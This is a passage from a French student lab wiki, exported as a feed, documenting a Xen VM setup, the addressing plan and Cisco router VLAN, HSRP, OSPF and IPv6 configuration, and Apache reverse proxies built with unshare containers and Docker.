 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== 3.1 L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49109</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49109"/>
				<updated>2018-12-21T15:40:47Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Les réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
